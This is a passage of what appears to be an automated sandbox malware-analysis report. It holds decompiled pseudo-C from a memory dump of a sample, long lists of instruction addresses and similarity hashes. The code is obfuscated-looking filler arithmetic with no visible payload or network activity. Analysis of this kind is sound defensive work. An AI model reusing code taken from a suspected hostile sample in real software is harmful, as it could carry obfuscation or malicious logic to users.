                                                                                                                                                                                                                                                                      				 *(_t958 + 0x70) =  &(( *(_t958 + 0x70))[1]);
                                                                                                                                                                                                                                                                      				return  *(_t958 - 0x8c);
                                                                                                                                                                                                                                                                      			}







































                                                                                                                                                                                                                                                                      0x01196711
                                                                                                                                                                                                                                                                      0x01196715
                                                                                                                                                                                                                                                                      0x01196727
                                                                                                                                                                                                                                                                      0x01196737
                                                                                                                                                                                                                                                                      0x0119673a
                                                                                                                                                                                                                                                                      0x01196741
                                                                                                                                                                                                                                                                      0x0119674d
                                                                                                                                                                                                                                                                      0x01196750
                                                                                                                                                                                                                                                                      0x0119675d
                                                                                                                                                                                                                                                                      0x0119676d
                                                                                                                                                                                                                                                                      0x01196775
                                                                                                                                                                                                                                                                      0x01196782
                                                                                                                                                                                                                                                                      0x01196793
                                                                                                                                                                                                                                                                      0x0119679a
                                                                                                                                                                                                                                                                      0x011967a9
                                                                                                                                                                                                                                                                      0x011967c5
                                                                                                                                                                                                                                                                      0x011967c8
                                                                                                                                                                                                                                                                      0x011967da
                                                                                                                                                                                                                                                                      0x011967ec
                                                                                                                                                                                                                                                                      0x01196805
                                                                                                                                                                                                                                                                      0x0119681e
                                                                                                                                                                                                                                                                      0x01196821
                                                                                                                                                                                                                                                                      0x0119682c
                                                                                                                                                                                                                                                                      0x01196840
                                                                                                                                                                                                                                                                      0x01196854
                                                                                                                                                                                                                                                                      0x0119685a
                                                                                                                                                                                                                                                                      0x01196876
                                                                                                                                                                                                                                                                      0x0119688a
                                                                                                                                                                                                                                                                      0x01196897
                                                                                                                                                                                                                                                                      0x011968a5
                                                                                                                                                                                                                                                                      0x011968c5
                                                                                                                                                                                                                                                                      0x011968cf
                                                                                                                                                                                                                                                                      0x011968d5
                                                                                                                                                                                                                                                                      0x011968f3
                                                                                                                                                                                                                                                                      0x0119690e
                                                                                                                                                                                                                                                                      0x01196916
                                                                                                                                                                                                                                                                      0x01196925
                                                                                                                                                                                                                                                                      0x01196928
                                                                                                                                                                                                                                                                      0x01196931
                                                                                                                                                                                                                                                                      0x0119693c
                                                                                                                                                                                                                                                                      0x01196945
                                                                                                                                                                                                                                                                      0x0119695b
                                                                                                                                                                                                                                                                      0x01196961
                                                                                                                                                                                                                                                                      0x01196970
                                                                                                                                                                                                                                                                      0x0119697e
                                                                                                                                                                                                                                                                      0x01196987
                                                                                                                                                                                                                                                                      0x0119698d
                                                                                                                                                                                                                                                                      0x01196999
                                                                                                                                                                                                                                                                      0x011969a1
                                                                                                                                                                                                                                                                      0x011969ae
                                                                                                                                                                                                                                                                      0x011969c3
                                                                                                                                                                                                                                                                      0x011969ce
                                                                                                                                                                                                                                                                      0x011969dc
                                                                                                                                                                                                                                                                      0x011969e3
                                                                                                                                                                                                                                                                      0x01196a11
                                                                                                                                                                                                                                                                      0x01196a19
                                                                                                                                                                                                                                                                      0x01196a22
                                                                                                                                                                                                                                                                      0x01196a25
                                                                                                                                                                                                                                                                      0x01196a2f
                                                                                                                                                                                                                                                                      0x01196a4b
                                                                                                                                                                                                                                                                      0x01196a5b
                                                                                                                                                                                                                                                                      0x01196a65
                                                                                                                                                                                                                                                                      0x01196a6e
                                                                                                                                                                                                                                                                      0x01196a71
                                                                                                                                                                                                                                                                      0x01196a76
                                                                                                                                                                                                                                                                      0x01196a7a
                                                                                                                                                                                                                                                                      0x01196a89
                                                                                                                                                                                                                                                                      0x01196a92
                                                                                                                                                                                                                                                                      0x01196a98
                                                                                                                                                                                                                                                                      0x01196a9c
                                                                                                                                                                                                                                                                      0x01196aa0
                                                                                                                                                                                                                                                                      0x01196aa4
                                                                                                                                                                                                                                                                      0x01196aa5
                                                                                                                                                                                                                                                                      0x01196aaa
                                                                                                                                                                                                                                                                      0x01196aad
                                                                                                                                                                                                                                                                      0x01196ad1
                                                                                                                                                                                                                                                                      0x01196adb
                                                                                                                                                                                                                                                                      0x01196ae3
                                                                                                                                                                                                                                                                      0x01196b09
                                                                                                                                                                                                                                                                      0x01196b2b
                                                                                                                                                                                                                                                                      0x01196b44
                                                                                                                                                                                                                                                                      0x01196b54
                                                                                                                                                                                                                                                                      0x01196b60
                                                                                                                                                                                                                                                                      0x01196b7a
                                                                                                                                                                                                                                                                      0x01196b83
                                                                                                                                                                                                                                                                      0x01196b86
                                                                                                                                                                                                                                                                      0x01196b8c
                                                                                                                                                                                                                                                                      0x01196ba0
                                                                                                                                                                                                                                                                      0x01196ba3
                                                                                                                                                                                                                                                                      0x01196bac
                                                                                                                                                                                                                                                                      0x01196bb9
                                                                                                                                                                                                                                                                      0x01196bc8
                                                                                                                                                                                                                                                                      0x01196be3
                                                                                                                                                                                                                                                                      0x01196be8
                                                                                                                                                                                                                                                                      0x01196bf3
                                                                                                                                                                                                                                                                      0x01196c1f
                                                                                                                                                                                                                                                                      0x01196c2b
                                                                                                                                                                                                                                                                      0x01196c2b
                                                                                                                                                                                                                                                                      0x01196b09
                                                                                                                                                                                                                                                                      0x011968a2
                                                                                                                                                                                                                                                                      0x011968a2
                                                                                                                                                                                                                                                                      0x01196c3f
                                                                                                                                                                                                                                                                      0x01196c4d
                                                                                                                                                                                                                                                                      0x01196c61
                                                                                                                                                                                                                                                                      0x01196c6c
                                                                                                                                                                                                                                                                      0x01196c7d
                                                                                                                                                                                                                                                                      0x01196c91
                                                                                                                                                                                                                                                                      0x01196c9f
                                                                                                                                                                                                                                                                      0x01196ca2
                                                                                                                                                                                                                                                                      0x01196cac
                                                                                                                                                                                                                                                                      0x01196ccd
                                                                                                                                                                                                                                                                      0x01196ce0
                                                                                                                                                                                                                                                                      0x01196ce3
                                                                                                                                                                                                                                                                      0x01196cec
                                                                                                                                                                                                                                                                      0x01196d0b
                                                                                                                                                                                                                                                                      0x01196d28
                                                                                                                                                                                                                                                                      0x01196d2d
                                                                                                                                                                                                                                                                      0x01196d30
                                                                                                                                                                                                                                                                      0x01196d45
                                                                                                                                                                                                                                                                      0x01196d58
                                                                                                                                                                                                                                                                      0x01196d5e
                                                                                                                                                                                                                                                                      0x01196d67
                                                                                                                                                                                                                                                                      0x01196d98
                                                                                                                                                                                                                                                                      0x01196dbd
                                                                                                                                                                                                                                                                      0x01196dd7
                                                                                                                                                                                                                                                                      0x01196de0
                                                                                                                                                                                                                                                                      0x01196de9
                                                                                                                                                                                                                                                                      0x01196df3
                                                                                                                                                                                                                                                                      0x01196e09
                                                                                                                                                                                                                                                                      0x01196c4a
                                                                                                                                                                                                                                                                      0x01196c4a
                                                                                                                                                                                                                                                                      0x01196e13
                                                                                                                                                                                                                                                                      0x01196e1f
                                                                                                                                                                                                                                                                      0x01196e23
                                                                                                                                                                                                                                                                      0x01196e2b
                                                                                                                                                                                                                                                                      0x01196e3f
                                                                                                                                                                                                                                                                      0x01196e45
                                                                                                                                                                                                                                                                      0x01196e4a
                                                                                                                                                                                                                                                                      0x01196e52
                                                                                                                                                                                                                                                                      0x01196e58
                                                                                                                                                                                                                                                                      0x01196e5f
                                                                                                                                                                                                                                                                      0x01196e65
                                                                                                                                                                                                                                                                      0x01196e6d
                                                                                                                                                                                                                                                                      0x01196e7e
                                                                                                                                                                                                                                                                      0x01196e92
                                                                                                                                                                                                                                                                      0x01196ea4
                                                                                                                                                                                                                                                                      0x01196eba
                                                                                                                                                                                                                                                                      0x01196ec1
                                                                                                                                                                                                                                                                      0x01196f05
                                                                                                                                                                                                                                                                      0x01196f1f
                                                                                                                                                                                                                                                                      0x01196f40
                                                                                                                                                                                                                                                                      0x01196f4d
                                                                                                                                                                                                                                                                      0x01196f65
                                                                                                                                                                                                                                                                      0x01196f6e
                                                                                                                                                                                                                                                                      0x01196f7a
                                                                                                                                                                                                                                                                      0x01196f8a

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 0479c1ccfe8b596d07968659dabf45cf0ea624313e8ec3b38ce1223129d44918
                                                                                                                                                                                                                                                                      • Instruction ID: 42000b884c91f3c3969e7cd6e1d25dc510c9a820bb7dbcab45c724cf75709128
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0479c1ccfe8b596d07968659dabf45cf0ea624313e8ec3b38ce1223129d44918
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09621374A00258CFCB28CFA8D4949A9BBF2FF99304B248159FD658B359DB35E952CF40
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                                                      			E01184250() {
                                                                                                                                                                                                                                                                      				signed int _t333;
                                                                                                                                                                                                                                                                      				signed int _t335;
                                                                                                                                                                                                                                                                      				signed int _t339;
                                                                                                                                                                                                                                                                      				signed char _t351;
                                                                                                                                                                                                                                                                      				signed int _t376;
                                                                                                                                                                                                                                                                      				signed int _t380;
                                                                                                                                                                                                                                                                      				intOrPtr _t389;
                                                                                                                                                                                                                                                                      				signed int _t390;
                                                                                                                                                                                                                                                                      				intOrPtr _t398;
                                                                                                                                                                                                                                                                      				intOrPtr _t412;
                                                                                                                                                                                                                                                                      				intOrPtr _t423;
                                                                                                                                                                                                                                                                      				intOrPtr _t425;
                                                                                                                                                                                                                                                                      				signed int _t435;
                                                                                                                                                                                                                                                                      				signed int _t444;
                                                                                                                                                                                                                                                                      				intOrPtr _t446;
                                                                                                                                                                                                                                                                      				short _t459;
                                                                                                                                                                                                                                                                      				signed short _t474;
                                                                                                                                                                                                                                                                      				signed int _t477;
                                                                                                                                                                                                                                                                      				intOrPtr _t494;
                                                                                                                                                                                                                                                                      				signed int _t502;
                                                                                                                                                                                                                                                                      				signed int _t510;
                                                                                                                                                                                                                                                                      				intOrPtr _t513;
                                                                                                                                                                                                                                                                      				intOrPtr _t522;
                                                                                                                                                                                                                                                                      				signed int _t525;
                                                                                                                                                                                                                                                                      				intOrPtr _t530;
                                                                                                                                                                                                                                                                      				signed int _t542;
                                                                                                                                                                                                                                                                      				signed int _t548;
                                                                                                                                                                                                                                                                      				intOrPtr _t575;
                                                                                                                                                                                                                                                                      				signed int _t577;
                                                                                                                                                                                                                                                                      				intOrPtr _t581;
                                                                                                                                                                                                                                                                      				intOrPtr _t594;
                                                                                                                                                                                                                                                                      				signed int _t619;
                                                                                                                                                                                                                                                                      				signed int* _t635;
                                                                                                                                                                                                                                                                      				void* _t637;
                                                                                                                                                                                                                                                                      				void* _t638;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t635 = _t637 - 0x68;
                                                                                                                                                                                                                                                                      				_t638 = _t637 - 0x9c;
                                                                                                                                                                                                                                                                      				_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                                      				_t635[0x10] = _t635[0x1f] + _t635[0x1f];
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t635 - 0x1c)) = 0xe5f;
                                                                                                                                                                                                                                                                      				_t635[0x13] = 0x1c27;
                                                                                                                                                                                                                                                                      				_t635[8] = _t635[0x1f] - 0x1b62;
                                                                                                                                                                                                                                                                      				_t333 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121dee0 = _t333 + 1;
                                                                                                                                                                                                                                                                      				_t435 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      				_t522 =  *0x121df1c; // 0x0
                                                                                                                                                                                                                                                                      				_t335 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      				_t635[0x12] = _t335 |  *(_t522 + _t435 * 4);
                                                                                                                                                                                                                                                                      				_t635[0xe] = _t635[0x1f] % 0x1244;
                                                                                                                                                                                                                                                                      				_t525 =  *0x121df30; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121df30 = _t525 + 1;
                                                                                                                                                                                                                                                                      				_t339 =  *0x121df30; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t635 - 0x20) =  *(_t635[0x1d] + 0x5c + _t635[0x1f] * 4) &  *(_t635[0x1e] + (_t339 << 1) * 4);
                                                                                                                                                                                                                                                                      				_t635[0x1f] = _t635[0x1f] - 1;
                                                                                                                                                                                                                                                                      				_t530 =  *0x121df0c; // 0x0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t635 - 0x24)) =  *((intOrPtr*)(_t530 + 0x1248)) - 0x18ed;
                                                                                                                                                                                                                                                                      				 *(_t635 - 0x28) =  *0x121dee6 & 0x000000ff ^  *(_t635[0x1e] + 0x1178);
                                                                                                                                                                                                                                                                      				_t635[0xd] =  *(_t635[0x1e] + (_t635[0x1f] << 2) * 4);
                                                                                                                                                                                                                                                                      				_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                                      				_t444 =  *0x121df38; // 0x0
                                                                                                                                                                                                                                                                      				_t635[0x17] = _t444 |  *0x121def8;
                                                                                                                                                                                                                                                                      				_t635[0x19] = ( *0x121dee6 & 0x000000ff) - 0x16b8;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t635 - 0x2c)) = 0x92;
                                                                                                                                                                                                                                                                      				_t446 =  *0x121dedc; // 0x0
                                                                                                                                                                                                                                                                      				_t635[0x18] =  *(_t446 + 4 + (( *0x121dee6 & 0x000000ff) << 2) * 4) * 0xf7b;
                                                                                                                                                                                                                                                                      				_t351 =  *0x121dee6; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121dee6 = _t351 + 1;
                                                                                                                                                                                                                                                                      				_t635[0xc] = 0x64f -  *0x121df08;
                                                                                                                                                                                                                                                                      				_t635[0x14] =  *(_t635[0x1d] + _t635[0x1f] * 4) | 0x00001351;
                                                                                                                                                                                                                                                                      				_t635[0xf] = (_t635[0x1c] + _t635[0x1f])[2] & 0x000000ff;
                                                                                                                                                                                                                                                                      				_t635[0x1f] = _t635[0x1f] - 1;
                                                                                                                                                                                                                                                                      				 *(_t635 - 0x30) = 0x6a6 /  *(_t635[0x1d] + (_t635[0x1f] << 2) * 4);
                                                                                                                                                                                                                                                                      				_t542 =  *0x121defc; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121defc = _t542 + 1;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t635 - 0x34)) = _t635[0x1f] +  *0x121defc;
                                                                                                                                                                                                                                                                      				_t635[0x15] = _t635[0x1f] +  *0x121df30;
                                                                                                                                                                                                                                                                      				_t635[0x16] =  *(_t635[0x1c] + _t635[0x1f]) & 0x000000ff;
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t642 = _t635[0x16] - (_t635[0x19] & 0x0000ffff);
                                                                                                                                                                                                                                                                      					if(_t635[0x16] < (_t635[0x19] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t635[9] =  *(_t635[0x14] + 0x66f0);
                                                                                                                                                                                                                                                                      					_t635[0x19] = _t635[0x19] - 1;
                                                                                                                                                                                                                                                                      					_t635[0xa] = ( *(_t635[0x17] + 0x2ea6) & 0x0000ffff) -  *((intOrPtr*)(_t635[0x1e] + (_t635[0x19] & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                      					_t635[0xb] = _t635[0x16] + _t635[0x16];
                                                                                                                                                                                                                                                                      					_push(_t635[0xb]);
                                                                                                                                                                                                                                                                      					_t398 = E01198C30(_t642, _t635[9], _t635[0xa]);
                                                                                                                                                                                                                                                                      					_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                      					 *0x121dee8 = _t398;
                                                                                                                                                                                                                                                                      					_t635[0x10] = (( *0x121def4 & 0x0000ffff) * 0x00000588 |  *(_t635[8] + _t635[0x1f] * 4)) / _t635[0x10];
                                                                                                                                                                                                                                                                      					_t635[7] =  *(_t635[0x13] + 4 + _t635[0x1f] * 3 * 4);
                                                                                                                                                                                                                                                                      					_t635[6] = _t635[0x1f];
                                                                                                                                                                                                                                                                      					_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                                      					_t643 = _t635[7] - _t635[6];
                                                                                                                                                                                                                                                                      					if(_t635[7] < _t635[6]) {
                                                                                                                                                                                                                                                                      						_t594 =  *0x121df24; // 0x0
                                                                                                                                                                                                                                                                      						_t494 =  *0x121deec; // 0x0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t635[0x13] + ( *(_t635[0x17]) & 0x0000ffff) * 4)) =  *(_t594 + _t635[0x1f] * 4) /  *(_t635[0x1d] + 4) -  *((intOrPtr*)(_t494 + ( *(_t635[0x17]) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t635[0x13] + ( *(_t635[0x17]) & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                      						_t635[0x17] = _t635[0x17] + 2;
                                                                                                                                                                                                                                                                      						_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                                      						_t635[0x19] = _t635[0x19] + 1;
                                                                                                                                                                                                                                                                      						_t412 =  *0x121dedc; // 0x0
                                                                                                                                                                                                                                                                      						_t635[0x15] =  *((intOrPtr*)(_t412 + ((_t635[0x19] & 0x0000ffff) << 2) * 4));
                                                                                                                                                                                                                                                                      						_t635[2] = ( *(_t635[0xc] + (( *(_t635[0x17]) & 0x0000ffff) << 2) * 2) & 0x0000ffff) * (_t635[0x18] & 0x000000ff);
                                                                                                                                                                                                                                                                      						_t502 =  *0x121df14; // 0x0
                                                                                                                                                                                                                                                                      						_t635[3] = _t502;
                                                                                                                                                                                                                                                                      						_t635[4] =  *(_t635[0x14] + ( *(_t635[0x17]) & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                      						_t635[5] =  *(_t635[0xd] + 0x18 + _t635[0x16] * 4);
                                                                                                                                                                                                                                                                      						 *(_t635[0x14]) =  *(_t635[0x14]) - 1;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t635[0xf] +  *(_t635[0x14]) * 4)) = E01194DD0(_t635[0x15] & 0x000000ff, _t635[2], _t635[3], _t635[4], _t635[5]);
                                                                                                                                                                                                                                                                      						 *(_t635 - 4) = _t635[0x15] & 0x000000ff;
                                                                                                                                                                                                                                                                      						_t510 =  *0x121defc; // 0x0
                                                                                                                                                                                                                                                                      						_t423 =  *0x121df20; // 0x0
                                                                                                                                                                                                                                                                      						 *_t635 =  *0x121def4 & 0x0000ffff ^  *(_t423 + _t510 * 4);
                                                                                                                                                                                                                                                                      						_t635[1] = _t635[0x1f];
                                                                                                                                                                                                                                                                      						_push(_t635[1]);
                                                                                                                                                                                                                                                                      						_t425 = E01198C30(_t643,  *(_t635 - 4),  *_t635);
                                                                                                                                                                                                                                                                      						_t638 = _t638 + 0x20;
                                                                                                                                                                                                                                                                      						_t513 =  *0x121dedc; // 0x0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t513 + 0x10 + _t635[0x16] * 4)) = _t425;
                                                                                                                                                                                                                                                                      						_t619 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                                                                                                      						 *0x121defc = (( *0x121dee4 & 0x000000ff) - ( *(_t635[0x1c] + _t619 * 4) & 0x000000ff)) %  *(_t635[0xf] + (_t635[0x16] << 2) * 4) + 0x0000004a |  *0x121defc;
                                                                                                                                                                                                                                                                      						 *((char*)(_t635[0x1c] +  *0x121df14 + 5)) = _t635[0x1f] % 0x1886;
                                                                                                                                                                                                                                                                      						_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t635[0x16] = _t635[0x16] + 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t548 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121df00 = (_t548 ^  *(_t635[0x13] + ( *(_t635[0x14]) << 1) * 4)) -  *(_t635[0x1d] + _t635[0x1f] * 4) ^ _t635[0x12] |  *0x121df00;
                                                                                                                                                                                                                                                                      				_t459 =  *0x121df34; // 0x0
                                                                                                                                                                                                                                                                      				 *((short*)(_t635[0x17] + 0x2c + ( *0x121def4 & 0x0000ffff) * 2)) = _t459;
                                                                                                                                                                                                                                                                      				 *(_t635[0x1e] + _t635[0x1f] * 4) = 0xb04 /  *(_t635[0x1d] + 0x1c + _t635[0x1f] * 4) /  *(_t635[0x13] + 0x18 + _t635[0x1f] * 4) % 0xabc /  *(_t635[0x1e] + _t635[0x1f] * 4);
                                                                                                                                                                                                                                                                      				 *(_t635[0x17]) =  *(_t635[0x17]) - 1;
                                                                                                                                                                                                                                                                      				 *(_t635[0xe] + ( *(_t635[0x17]) & 0x0000ffff) * 2) = 0x1365 - _t635[0x12] + ( *(_t635[0xe] + ( *(_t635[0x17]) & 0x0000ffff) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                      				_t376 =  *0x121df38; // 0x0
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				 *(_t635 - 0x18) = _t376 / ( *0x121def4 & 0x0000ffff);
                                                                                                                                                                                                                                                                      				_t635[0x12] = _t635[0x12] - 1;
                                                                                                                                                                                                                                                                      				 *(_t635 - 0x14) =  *(_t635[0xd] + ( *0x121dee6 & 0x000000ff) * 4) ^ _t635[0x12];
                                                                                                                                                                                                                                                                      				_t380 =  *0x121def8; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t635 - 0x10) = _t380 *  *(_t635[0x1e] + 0xc + ( *(_t635[0x17]) & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                      				 *(_t635 - 0xc) = _t635[0x19] & 0x0000ffff;
                                                                                                                                                                                                                                                                      				_t635[0x19] = _t635[0x19] + 1;
                                                                                                                                                                                                                                                                      				_t575 =  *0x121deec; // 0x0
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				 *(_t635 - 8) =  *(_t575 + _t635[0x1f] * 4) / (_t635[0x18] & 0x000000ff);
                                                                                                                                                                                                                                                                      				_t635[0x18] = _t635[0x18] + 1;
                                                                                                                                                                                                                                                                      				_t474 =  *0x121ded8; // 0x0
                                                                                                                                                                                                                                                                      				_t635[0x11] = _t474;
                                                                                                                                                                                                                                                                      				_t577 =  *0x121df38; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121df38 = _t577 - 1;
                                                                                                                                                                                                                                                                      				_t389 = E011964B0( *(_t635 - 0x18),  *(_t635 - 0x14),  *(_t635 - 0x10),  *(_t635 - 0xc),  *(_t635 - 8), _t635[0x11] & 0x0000ffff);
                                                                                                                                                                                                                                                                      				_t477 =  *0x121df38; // 0x0
                                                                                                                                                                                                                                                                      				_t581 =  *0x121deec; // 0x0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t581 + 0x24 + _t477 * 4)) = _t389;
                                                                                                                                                                                                                                                                      				_t390 =  *0x121df08; // 0x0
                                                                                                                                                                                                                                                                      				__eflags =  &(_t635[0x1a]);
                                                                                                                                                                                                                                                                      				return  *(_t635[0xc] + (_t390 << 1) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                      			}






































                                                                                                                                                                                                                                                                      0x01184251
                                                                                                                                                                                                                                                                      0x01184255
                                                                                                                                                                                                                                                                      0x01184262
                                                                                                                                                                                                                                                                      0x0118426b
                                                                                                                                                                                                                                                                      0x0118426e
                                                                                                                                                                                                                                                                      0x01184275
                                                                                                                                                                                                                                                                      0x01184285
                                                                                                                                                                                                                                                                      0x01184288
                                                                                                                                                                                                                                                                      0x01184290
                                                                                                                                                                                                                                                                      0x01184295
                                                                                                                                                                                                                                                                      0x0118429b
                                                                                                                                                                                                                                                                      0x011842a1
                                                                                                                                                                                                                                                                      0x011842a9
                                                                                                                                                                                                                                                                      0x011842b8
                                                                                                                                                                                                                                                                      0x011842bb
                                                                                                                                                                                                                                                                      0x011842c4
                                                                                                                                                                                                                                                                      0x011842ca
                                                                                                                                                                                                                                                                      0x011842e1
                                                                                                                                                                                                                                                                      0x011842ea
                                                                                                                                                                                                                                                                      0x011842f8
                                                                                                                                                                                                                                                                      0x01184306
                                                                                                                                                                                                                                                                      0x01184321
                                                                                                                                                                                                                                                                      0x01184330
                                                                                                                                                                                                                                                                      0x01184339
                                                                                                                                                                                                                                                                      0x0118433c
                                                                                                                                                                                                                                                                      0x01184348
                                                                                                                                                                                                                                                                      0x01184358
                                                                                                                                                                                                                                                                      0x0118435c
                                                                                                                                                                                                                                                                      0x0118436d
                                                                                                                                                                                                                                                                      0x0118437b
                                                                                                                                                                                                                                                                      0x0118437e
                                                                                                                                                                                                                                                                      0x01184385
                                                                                                                                                                                                                                                                      0x01184395
                                                                                                                                                                                                                                                                      0x011843a7
                                                                                                                                                                                                                                                                      0x011843b4
                                                                                                                                                                                                                                                                      0x011843bd
                                                                                                                                                                                                                                                                      0x011843d3
                                                                                                                                                                                                                                                                      0x011843d6
                                                                                                                                                                                                                                                                      0x011843df
                                                                                                                                                                                                                                                                      0x011843ee
                                                                                                                                                                                                                                                                      0x011843fa
                                                                                                                                                                                                                                                                      0x01184406
                                                                                                                                                                                                                                                                      0x01184414
                                                                                                                                                                                                                                                                      0x01184418
                                                                                                                                                                                                                                                                      0x0118441b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01184432
                                                                                                                                                                                                                                                                      0x0118443d
                                                                                                                                                                                                                                                                      0x0118445d
                                                                                                                                                                                                                                                                      0x01184466
                                                                                                                                                                                                                                                                      0x0118446c
                                                                                                                                                                                                                                                                      0x01184475
                                                                                                                                                                                                                                                                      0x0118447a
                                                                                                                                                                                                                                                                      0x0118447d
                                                                                                                                                                                                                                                                      0x0118449d
                                                                                                                                                                                                                                                                      0x011844ab
                                                                                                                                                                                                                                                                      0x011844b1
                                                                                                                                                                                                                                                                      0x011844ba
                                                                                                                                                                                                                                                                      0x011844c0
                                                                                                                                                                                                                                                                      0x011844c3
                                                                                                                                                                                                                                                                      0x011844d7
                                                                                                                                                                                                                                                                      0x011844ee
                                                                                                                                                                                                                                                                      0x0118450c
                                                                                                                                                                                                                                                                      0x01184515
                                                                                                                                                                                                                                                                      0x0118451e
                                                                                                                                                                                                                                                                      0x01184529
                                                                                                                                                                                                                                                                      0x01184534
                                                                                                                                                                                                                                                                      0x0118453c
                                                                                                                                                                                                                                                                      0x01184556
                                                                                                                                                                                                                                                                      0x01184559
                                                                                                                                                                                                                                                                      0x0118455f
                                                                                                                                                                                                                                                                      0x0118456e
                                                                                                                                                                                                                                                                      0x0118457b
                                                                                                                                                                                                                                                                      0x01184589
                                                                                                                                                                                                                                                                      0x011845b0
                                                                                                                                                                                                                                                                      0x011845b7
                                                                                                                                                                                                                                                                      0x011845ba
                                                                                                                                                                                                                                                                      0x011845c7
                                                                                                                                                                                                                                                                      0x011845cf
                                                                                                                                                                                                                                                                      0x011845d5
                                                                                                                                                                                                                                                                      0x011845db
                                                                                                                                                                                                                                                                      0x011845e4
                                                                                                                                                                                                                                                                      0x011845e9
                                                                                                                                                                                                                                                                      0x011845ef
                                                                                                                                                                                                                                                                      0x011845f5
                                                                                                                                                                                                                                                                      0x01184600
                                                                                                                                                                                                                                                                      0x01184618
                                                                                                                                                                                                                                                                      0x01184625
                                                                                                                                                                                                                                                                      0x01184640
                                                                                                                                                                                                                                                                      0x01184649
                                                                                                                                                                                                                                                                      0x01184649
                                                                                                                                                                                                                                                                      0x01184411
                                                                                                                                                                                                                                                                      0x01184411
                                                                                                                                                                                                                                                                      0x0118465b
                                                                                                                                                                                                                                                                      0x01184676
                                                                                                                                                                                                                                                                      0x01184686
                                                                                                                                                                                                                                                                      0x0118468d
                                                                                                                                                                                                                                                                      0x011846cb
                                                                                                                                                                                                                                                                      0x011846db
                                                                                                                                                                                                                                                                      0x011846fe
                                                                                                                                                                                                                                                                      0x01184709
                                                                                                                                                                                                                                                                      0x0118470e
                                                                                                                                                                                                                                                                      0x01184711
                                                                                                                                                                                                                                                                      0x0118471a
                                                                                                                                                                                                                                                                      0x0118472d
                                                                                                                                                                                                                                                                      0x01184739
                                                                                                                                                                                                                                                                      0x01184743
                                                                                                                                                                                                                                                                      0x0118474a
                                                                                                                                                                                                                                                                      0x01184755
                                                                                                                                                                                                                                                                      0x01184760
                                                                                                                                                                                                                                                                      0x01184769
                                                                                                                                                                                                                                                                      0x0118476c
                                                                                                                                                                                                                                                                      0x01184774
                                                                                                                                                                                                                                                                      0x01184777
                                                                                                                                                                                                                                                                      0x0118477e
                                                                                                                                                                                                                                                                      0x01184782
                                                                                                                                                                                                                                                                      0x0118478b
